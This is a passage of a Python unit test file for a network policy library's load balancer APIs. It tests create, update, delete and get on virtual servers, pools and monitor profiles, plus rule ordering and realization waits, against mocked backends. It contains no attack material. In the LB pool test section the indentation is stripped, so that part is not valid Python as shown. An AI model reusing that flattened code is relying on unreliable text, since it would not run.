                'realization_specific_identifier': lbs_id,
                'entity_type': 'LbServiceDto',
                'alarms': [{
                    'message': error_msg,
                    'error_details': {
                        'related_errors': [{
                            'error_code': related_error_code,
                            'module_name': 'LOAD-BALANCER',
                            'error_message': related_error_msg
                        }],
                        'error_code': error_code,
                        'module_name': 'LOAD-BALANCER',
                        'error_message': error_msg
                    }
                }]}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=info):
            with self.assertRaises(nsxlib_exc.RealizationErrorStateError) as e:
                self.resourceApi.wait_until_realized(
                    lbs_id, tenant=TEST_TENANT)
            # The exception message must end with the main error followed
            # by its related error, and carry both error codes.
            error_msg_tail = "%s: %s" % (error_msg, related_error_msg)
            self.assertTrue(e.exception.msg.endswith(error_msg_tail))
            self.assertEqual(e.exception.error_code, error_code)
            self.assertEqual(e.exception.related_error_codes,
                             [related_error_code])

    def test_wait_until_realized_succeed(self):
        """A REALIZED state returns the realization info unchanged."""
        lbs_id = 'test_lbs'
        info = {'state': constants.STATE_REALIZED,
                'realization_specific_identifier': lbs_id,
                'entity_type': 'LbServiceDto'}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=info):
            actual_info = self.resourceApi.wait_until_realized(
                lbs_id, max_attempts=5, sleep=0.1, tenant=TEST_TENANT)
            self.assertEqual(info, actual_info)
class TestPolicyLBVirtualServer(test_resources.NsxPolicyLibTestCase):
    """Tests for the LB virtual server policy resource API.

    Covers CRUD, LB-rule list manipulation (add/update/remove at a
    position or by name suffix), access-list control, realization
    waiting and SSL/persistence binding removal. Backend calls are
    mocked throughout.
    """

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBVirtualServer, self).setUp()
        self.resourceApi = self.policy_lib.load_balancer.virtual_server

    def test_create_with_id(self):
        """Create with explicit ID, WAF profile binding and ACL control."""
        name = 'd1'
        description = 'desc'
        obj_id = '111'
        waf_profile_id = 'waf'
        waf_profile_path = self.policy_lib.waf_profile.get_path(
            profile_id=waf_profile_id, tenant=TEST_TENANT)
        waf_profile_binding = lb_defs.WAFProfileBindingDef(
            waf_profile_path=waf_profile_path)
        lb_acl = self.resourceApi.build_access_list_control(
            constants.ACTION_ALLOW, 'fake_group_path', True)
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name,
                virtual_server_id=obj_id,
                waf_profile_binding=waf_profile_binding,
                description=description,
                access_list_control=lb_acl,
                tenant=TEST_TENANT)
            # The ACL object is serialized to a dict on the expected def.
            expected_def = lb_defs.LBVirtualServerDef(
                nsx_version=self.policy_lib.get_version(),
                virtual_server_id=obj_id, name=name, description=description,
                waf_profile_binding=waf_profile_binding,
                access_list_control=lb_acl.get_obj_dict(),
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_create_without_id(self):
        """Creating without an explicit ID auto-generates one."""
        name = 'd1'
        description = 'desc'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                tenant=TEST_TENANT)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=mock.ANY, name=name, description=description,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        """Delete passes the virtual server ID through to the API."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        """Get builds a def keyed by the ID and returns the payload."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

    def test_get_by_name(self):
        """get_by_name lists servers and matches on display_name."""
        name = 'd1'
        with mock.patch.object(
                self.policy_api, "list",
                return_value={'results': [{'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = lb_defs.LBVirtualServerDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_list(self):
        """An empty backend listing yields an empty result."""
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': []}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = lb_defs.LBVirtualServerDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual([], result)

    def test_update(self):
        """Update forwards changed name/description into the def."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        vs_name = 'name-name'
        with self.mock_get(obj_id, vs_name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    description=description,
                                    tenant=TEST_TENANT)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=obj_id, name=name,
                description=description,
                tenant=TEST_TENANT)
            self.assert_called_with_def(update_call, expected_def)

    def test_update_log_parameters(self):
        """Log flags are forwarded when the NSX version supports them."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        vs_name = 'name-name'
        with self.mock_get(obj_id, vs_name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    description=description,
                                    tenant=TEST_TENANT,
                                    access_log_enabled=True,
                                    log_significant_event_only=True)
            expected_def = lb_defs.LBVirtualServerDef(
                nsx_version=nsx_constants.NSX_VERSION_3_0_0,
                virtual_server_id=obj_id, name=name,
                description=description,
                tenant=TEST_TENANT, access_log_enabled=True,
                log_significant_event_only=True)
            self.assert_called_with_def(update_call, expected_def)

    def test_log_parameters_for_version(self):
        """Log flags are dropped below NSX 3.0 and kept from 3.0 on."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        # On 2.5.0 the log attributes must not appear in the body.
        expected_def = lb_defs.LBVirtualServerDef(
            nsx_version=nsx_constants.NSX_VERSION_2_5_0,
            virtual_server_id=obj_id, name=name,
            description=description,
            tenant=TEST_TENANT, access_log_enabled=True,
            log_significant_event_only=True)
        self.assertFalse('access_log_enabled' in expected_def.get_obj_dict())
        self.assertFalse('log_significant_event_only' in
                         expected_def.get_obj_dict())
        # On 3.0.0 both attributes must be serialized.
        expected_def = lb_defs.LBVirtualServerDef(
            nsx_version=nsx_constants.NSX_VERSION_3_0_0,
            virtual_server_id=obj_id, name=name,
            description=description,
            tenant=TEST_TENANT, access_log_enabled=True,
            log_significant_event_only=True)
        self.assertTrue('access_log_enabled' in expected_def.get_obj_dict())
        self.assertTrue('log_significant_event_only' in
                        expected_def.get_obj_dict())

    def test_non_partial_update(self):
        """allow_partial_updates=False issues a full (non-patch) update."""
        obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(obj_id, vs_name, max_concurrent_connections=80), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    max_concurrent_connections=None,
                                    tenant=TEST_TENANT,
                                    allow_partial_updates=False)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=obj_id, name=vs_name,
                max_concurrent_connections=None,
                tenant=TEST_TENANT)
            update_call.assert_called_with(mock.ANY, partial_updates=False,
                                           force=False)
            self.assert_called_with_def(update_call, expected_def)

    def test_add_lb_rule(self):
        """Adding a rule without a position appends it."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        rule_actions = 'test1'
        rule_match_conditions = 'test2'
        rule_name = 'dummy_rule'
        rule_match_strategy = 'test3'
        rule_phase = 'test4'
        with self.mock_get(vs_obj_id, vs_name), \
            self.mock_create_update() as update_call:
            self.resourceApi.add_lb_rule(
                vs_obj_id, actions=rule_actions, name=rule_name,
                match_conditions=rule_match_conditions,
                match_strategy=rule_match_strategy, phase=rule_phase)
            lb_rule = lb_defs.LBRuleDef(
                rule_actions, rule_match_conditions, rule_name,
                rule_match_strategy, rule_phase)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[lb_rule])
            self.assert_called_with_def(update_call, expected_def)

    def test_add_lb_rule_first(self):
        """position=0 inserts the new rule before existing rules."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        rule_actions = 'test1'
        rule_match_conditions = 'test2'
        rule_name = 'dummy_rule'
        rule_match_strategy = 'test3'
        rule_phase = 'test4'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx'},
                                  {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.add_lb_rule(
                vs_obj_id, actions=rule_actions, name=rule_name,
                match_conditions=rule_match_conditions,
                match_strategy=rule_match_strategy, phase=rule_phase,
                position=0)
            lb_rule = lb_defs.LBRuleDef(
                rule_actions, rule_match_conditions, rule_name,
                rule_match_strategy, rule_phase)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[lb_rule,
                       {'display_name': 'xx'},
                       {'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_add_lb_rule_last(self):
        """Without a position the new rule lands at the end."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        rule_actions = 'test1'
        rule_match_conditions = 'test2'
        rule_name = 'dummy_rule'
        rule_match_strategy = 'test3'
        rule_phase = 'test4'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx'},
                                  {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.add_lb_rule(
                vs_obj_id, actions=rule_actions, name=rule_name,
                match_conditions=rule_match_conditions,
                match_strategy=rule_match_strategy, phase=rule_phase)
            lb_rule = lb_defs.LBRuleDef(
                rule_actions, rule_match_conditions, rule_name,
                rule_match_strategy, rule_phase)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'xx'},
                       {'display_name': 'yy'},
                       lb_rule])
            self.assert_called_with_def(update_call, expected_def)

    def test_add_lb_rule_last_over(self):
        """A position past the end behaves like an append."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        rule_actions = 'test1'
        rule_match_conditions = 'test2'
        rule_name = 'dummy_rule'
        rule_match_strategy = 'test3'
        rule_phase = 'test4'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx'},
                                  {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.add_lb_rule(
                vs_obj_id, actions=rule_actions, name=rule_name,
                match_conditions=rule_match_conditions,
                match_strategy=rule_match_strategy, phase=rule_phase,
                position=999)
            lb_rule = lb_defs.LBRuleDef(
                rule_actions, rule_match_conditions, rule_name,
                rule_match_strategy, rule_phase)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'xx'},
                       {'display_name': 'yy'},
                       lb_rule])
            self.assert_called_with_def(update_call, expected_def)

    def test_add_lb_rule_mid(self):
        """A middle position inserts between existing rules."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        rule_actions = 'test1'
        rule_match_conditions = 'test2'
        rule_name = 'dummy_rule'
        rule_match_strategy = 'test3'
        rule_phase = 'test4'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx'},
                                  {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.add_lb_rule(
                vs_obj_id, actions=rule_actions, name=rule_name,
                match_conditions=rule_match_conditions,
                match_strategy=rule_match_strategy, phase=rule_phase,
                position=1)
            lb_rule = lb_defs.LBRuleDef(
                rule_actions, rule_match_conditions, rule_name,
                rule_match_strategy, rule_phase)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'xx'},
                       lb_rule,
                       {'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_update_lb_rule(self):
        """Updating a rule by name rewrites only that rule's fields."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(
            vs_obj_id, vs_name,
            rules=[{'display_name': 'xx', 'actions': '11'},
                   {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.update_lb_rule(vs_obj_id, 'xx', actions='22')
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'xx', 'actions': '22'},
                       {'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_update_lb_rule_position(self):
        """Updating with a position also moves the rule."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(
            vs_obj_id, vs_name,
            rules=[{'display_name': 'xx', 'actions': '11'},
                   {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.update_lb_rule(vs_obj_id, 'xx', actions='22',
                                            position=1)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'yy'},
                       {'display_name': 'xx', 'actions': '22'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_update_lb_rule_suffix(self):
        """compare_name_suffix selects the rule whose name ends so."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(
            vs_obj_id, vs_name,
            rules=[{'display_name': 'xx_with_suffix', 'actions': '11'},
                   {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.update_lb_rule(
                vs_obj_id, 'xx', actions='22',
                compare_name_suffix='suffix')
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'xx', 'actions': '22'},
                       {'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_update_lb_rule_wrong_suffix(self):
        """A suffix matching no rule raises ResourceNotFound."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(
            vs_obj_id, vs_name,
            rules=[{'display_name': 'xx_with_suffix', 'actions': '11'},
                   {'display_name': 'yy'}]):
            self.assertRaises(nsxlib_exc.ResourceNotFound,
                              self.resourceApi.update_lb_rule,
                              vs_obj_id, 'xx', actions='22',
                              compare_name_suffix='bad')

    def test_remove_lb_rule(self):
        """Removing a rule by exact name drops it from the list."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx'},
                                  {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.remove_lb_rule(vs_obj_id, 'xx')
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_remove_lb_rule_by_suffix(self):
        """check_name_suffix removes rules whose name ends with it."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx_with_suffix'},
                                  {'display_name': 'yy'}]), \
            self.mock_create_update() as update_call:
            self.resourceApi.remove_lb_rule(vs_obj_id, 'with_suffix',
                                            check_name_suffix=True)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_remove_lb_rule_wrong_suffix(self):
        """A non-matching suffix leaves the rule list unchanged."""
        vs_obj_id = '111'
        vs_name = 'name-name'
        with self.mock_get(vs_obj_id, vs_name,
                           rules=[{'display_name': 'xx_with_suffix'},
                                  {'display_name': 'yy'}]),\
            self.mock_create_update() as update_call:
            # 'wrong_suffiX' (capital X) matches no rule name suffix,
            # so the expected rule list is unchanged.
            self.resourceApi.remove_lb_rule(vs_obj_id, 'wrong_suffiX',
                                            check_name_suffix=True)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_obj_id,
                rules=[{'display_name': 'xx_with_suffix'},
                       {'display_name': 'yy'}])
            self.assert_called_with_def(update_call, expected_def)

    def test_build_access_list_control(self):
        """build_access_list_control serializes action/enabled/group."""
        lb_acl = self.resourceApi.build_access_list_control(
            constants.ACTION_ALLOW, 'fake_group_path', True)
        expected_acl_dict = {
            'action': constants.ACTION_ALLOW,
            'enabled': True,
            'group_path': 'fake_group_path'
        }
        self.assertDictEqual(lb_acl.get_obj_dict(), expected_acl_dict)

    def test_wait_until_realized_fail(self):
        """An UNREALIZED state eventually raises a timeout error."""
        vs_id = 'test_vs'
        info = {'state': constants.STATE_UNREALIZED,
                'realization_specific_identifier': vs_id}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=info):
            self.assertRaises(nsxlib_exc.RealizationTimeoutError,
                              self.resourceApi.wait_until_realized,
                              vs_id, max_attempts=5, sleep=0.1,
                              tenant=TEST_TENANT)

    def test_wait_until_realized_succeed(self):
        """A REALIZED state returns the realization info unchanged."""
        vs_id = 'test_vs'
        info = {'state': constants.STATE_REALIZED,
                'realization_specific_identifier': vs_id,
                'entity_type': 'LbVirtualServerDto'}
        with mock.patch.object(self.resourceApi, "_get_realization_info",
                               return_value=info):
            actual_info = self.resourceApi.wait_until_realized(
                vs_id, entity_type='LbVirtualServerDto', max_attempts=5,
                sleep=0.1, tenant=TEST_TENANT)
            self.assertEqual(info, actual_info)

    def test_remove_virtual_server_client_ssl_profile_binding(self):
        """Removing the client SSL binding updates without it."""
        vs_id = 'test-id'
        vs_name = 'test-name'
        client_binding = {
            'default_certificate_path': '/infra/certificates/test-cert',
            'client_ssl_profile_path': '/infra/lb-client-ssl-profiles/default'}
        server_binding = {
            'ssl_profile_path': '/infra/lb-server-ssl-profiles/test'}
        with self.mock_get(
            vs_id, vs_name, client_ssl_profile_binding=client_binding,
            server_ssl_profile_binding=server_binding), \
            self.mock_create_update() as update_call:
            self.resourceApi.remove_virtual_server_client_ssl_profile_binding(
                vs_id)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_id, name=vs_name)
            self.assert_called_with_def(update_call, expected_def)

    def test_remove_dlb_virtual_server_persistence_profile(self):
        """Removing the persistence profile updates without its path."""
        vs_id = 'test-id'
        vs_name = 'test-name'
        with self.mock_get(
            vs_id, vs_name, lb_persistence_profile_path='test-profile'), \
            self.mock_create_update() as update_call:
            self.resourceApi.remove_dlb_virtual_server_persistence_profile(
                vs_id)
            expected_def = lb_defs.LBVirtualServerDef(
                virtual_server_id=vs_id, name=vs_name)
            self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBPoolApi(test_resources.NsxPolicyLibTestCase):
    def setUp(self, *args, **kwargs):
        # Exercise the LB pool resource API exposed by the policy lib.
        super(TestPolicyLBPoolApi, self).setUp()
        self.resourceApi = self.policy_lib.load_balancer.lb_pool
def test_create_with_id(self):
name = 'd1'
description = 'desc'
obj_id = '111'
members = [
lb_defs.LBPoolMemberDef(ip_address='10.0.0.1')]
algorithm = 'algo'
active_monitor_paths = 'path1'
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name,
lb_pool_id=obj_id,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result)
def test_create_without_id(self):
name = 'd1'
description = 'desc'
with mock.patch.object(self.policy_api,
"create_or_update") as api_call:
result = self.resourceApi.create_or_overwrite(
name, description=description,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=mock.ANY,
name=name,
description=description,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertIsNotNone(result)
def test_create_with_retry_stale_revision(self):
name = 'd1'
description = 'desc'
obj_id = '111'
members = [
lb_defs.LBPoolMemberDef(ip_address='10.0.0.1')]
algorithm = 'algo'
active_monitor_paths = 'path1'
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "create_or_update",
side_effect=nsxlib_exc.StaleRevision
) as api_call:
with self.assertRaises(nsxlib_exc.StaleRevision):
self.resourceApi.create_or_overwrite(
name,
lb_pool_id=obj_id,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT)
self.assertEqual(nsxlib_testcase.NSX_MAX_ATTEMPTS,
api_call.call_count)
def test_create_with_retry_pending_delete(self):
name = 'd1'
description = 'desc'
obj_id = '111'
members = [
lb_defs.LBPoolMemberDef(ip_address='10.0.0.1')]
algorithm = 'algo'
active_monitor_paths = 'path1'
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "create_or_update",
side_effect=nsxlib_exc.NsxPendingDelete
) as api_call:
with self.assertRaises(nsxlib_exc.NsxPendingDelete):
self.resourceApi.create_or_overwrite(
name,
lb_pool_id=obj_id,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT)
self.assertEqual(nsxlib_testcase.NSX_MAX_ATTEMPTS,
api_call.call_count)
def test_delete(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "delete") as api_call:
self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_get(self):
obj_id = '111'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}) as api_call:
result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual(obj_id, result['id'])
def test_get_by_name(self):
name = 'd1'
with mock.patch.object(
self.policy_api, "list",
return_value={'results': [{'display_name': name}]}) as api_call:
obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
self.assertIsNotNone(obj)
expected_def = lb_defs.LBPoolDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
def test_list(self):
with mock.patch.object(self.policy_api, "list",
return_value={'results': []}) as api_call:
result = self.resourceApi.list(tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
tenant=TEST_TENANT)
self.assert_called_with_def(api_call, expected_def)
self.assertEqual([], result)
def test_update(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
members = [{'ip_address': '10.0.0.1'}]
algorithm = 'algo'
active_monitor_paths = ['path1']
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tcp_multiplexing_enabled=True,
tcp_multiplexing_number=10,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_update_without_partial_patch(self):
obj_id = '111'
name = 'new name'
description = 'new desc'
members = [{'ip_address': '10.0.0.1'}]
algorithm = 'algo'
active_monitor_paths = ['path1']
member_group = 'group1'
snat_translation = False
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.update(obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT,
allow_partial_updates=False)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
name=name,
description=description,
members=members,
active_monitor_paths=active_monitor_paths,
algorithm=algorithm,
member_group=member_group,
snat_translation=snat_translation,
tenant=TEST_TENANT)
update_call.assert_called_with(mock.ANY, partial_updates=False,
force=False)
self.assert_called_with_def(update_call, expected_def)
def test_add_monitor_to_pool(self):
obj_id = '111'
active_monitor_paths = ['path1']
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.add_monitor_to_pool(
obj_id,
active_monitor_paths,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
active_monitor_paths=active_monitor_paths,
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_remove_monitor_from_pool(self):
obj_id = '111'
removed_monitor_path = 'path1'
stay_monitor_path = 'path2'
active_monitors = [removed_monitor_path, stay_monitor_path]
with mock.patch.object(
self.policy_api, "get", return_value={
'id': obj_id, 'active_monitor_paths': active_monitors}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.remove_monitor_from_pool(
obj_id,
removed_monitor_path,
tenant=TEST_TENANT)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
active_monitor_paths=[stay_monitor_path],
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_create_pool_member_and_add_to_pool(self):
obj_id = '111'
ip_address = '1.1.1.1'
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.create_pool_member_and_add_to_pool(
obj_id, ip_address,
tenant=TEST_TENANT)
mem_def = lb_defs.LBPoolMemberDef(ip_address)
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
members=[mem_def],
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_update_pool_member(self):
obj_id = '111'
ip_address = '1.1.1.1'
port = '80'
new_name = 'mem1'
member = {'ip_address': ip_address, 'port': port,
'backup_member': True}
with mock.patch.object(self.policy_api, "get",
return_value={'id': obj_id,
'members': [member]}), \
mock.patch.object(self.policy_api,
"create_or_update") as update_call:
self.resourceApi.update_pool_member(
obj_id, ip_address, port=port, display_name=new_name,
backup_member=False, tenant=TEST_TENANT)
new_member = copy.copy(member)
new_member['display_name'] = new_name
new_member['backup_member'] = False
expected_def = lb_defs.LBPoolDef(
lb_pool_id=obj_id,
members=[new_member],
tenant=TEST_TENANT)
self.assert_called_with_def(update_call, expected_def)
def test_wait_until_realized_fail(self):
pool_id = 'test_pool'
info = {'state': constants.STATE_UNREALIZED,
'realization_specific_identifier': pool_id}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
self.assertRaises(nsxlib_exc.RealizationTimeoutError,
self.resourceApi.wait_until_realized,
pool_id, max_attempts=5, sleep=0.1,
tenant=TEST_TENANT)
def test_wait_until_realized_succeed(self):
pool_id = 'test_pool'
info = {'state': constants.STATE_REALIZED,
'realization_specific_identifier': pool_id,
'entity_type': 'LbPoolDto'}
with mock.patch.object(self.resourceApi, "_get_realization_info",
return_value=info):
actual_info = self.resourceApi.wait_until_realized(
pool_id, entity_type='LbPoolDto', max_attempts=5,
sleep=0.1, tenant=TEST_TENANT)
self.assertEqual(info, actual_info)
class TestPolicyLBMonitorProfileHttpApi(test_resources.NsxPolicyLibTestCase):
    """Unit tests for the policy LB HTTP monitor-profile API.

    Subclasses rebind ``self.resourceApi`` / ``self.obj_def`` in setUp to
    reuse this suite for the HTTPS/UDP/ICMP/TCP monitor profiles.
    """

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBMonitorProfileHttpApi, self).setUp()
        self.resourceApi = (
            self.policy_lib.load_balancer.lb_monitor_profile_http)
        self.obj_def = lb_defs.LBHttpMonitorProfileDef

    def test_create_with_id(self):
        name = 'd1'
        obj_id = '111'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                lb_monitor_profile_id=obj_id,
                name=name,
                tenant=TEST_TENANT)
            expected_def = self.obj_def(
                lb_monitor_profile_id=obj_id,
                name=name,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_create_without_id(self):
        # When no id is given the resource API generates one (mock.ANY).
        name = 'd1'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name=name,
                tenant=TEST_TENANT)
            expected_def = self.obj_def(
                lb_monitor_profile_id=mock.ANY,
                name=name,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = self.obj_def(
                lb_monitor_profile_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = self.obj_def(
                lb_monitor_profile_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

